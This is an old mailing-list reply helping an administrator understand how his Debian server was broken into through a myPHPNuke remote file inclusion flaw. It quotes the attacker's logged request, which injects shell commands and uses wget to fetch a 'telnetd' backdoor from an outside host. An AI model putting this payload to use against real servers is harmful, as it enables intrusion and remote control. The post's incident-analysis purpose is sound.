On Mon, Jan 19, 2004 at 14:40:12 +0100, Csan wrote: > One of my servers has been cracked into and I am looking for the weak > spots of the system and also looking for ways to lock the secholes I might > (also) have. The linux box is an up-to-date woody (incl. security > updates). > > My first question is how come such a thing worked on my box?
Apparently you installed PHP code that had a security vulnerability. > "GET > //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd; > HTTP/1.1" 200 7047 This appears to be exploiting the vulnerability described in http://www.secunia.com/advisories/9721/ ("myPHPNuke Arbitrary File Inclusion Vulnerability", 2003-09-12). > (Debian unstable has version 0.732-4.2, so the first thing to do is to > backport the unstable version. Or is it rather a php bug?: No, it's a myPHPNuke bug; it doesn't do enough input validation (see http://www.tldp.org/HOWTO/Secure-Programs-HOWTO/input.html). HTH, Ray -- [...] computer source code, though unintelligible to many, is the preferred method of communication among computer programmers. http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION=00a0117p.06
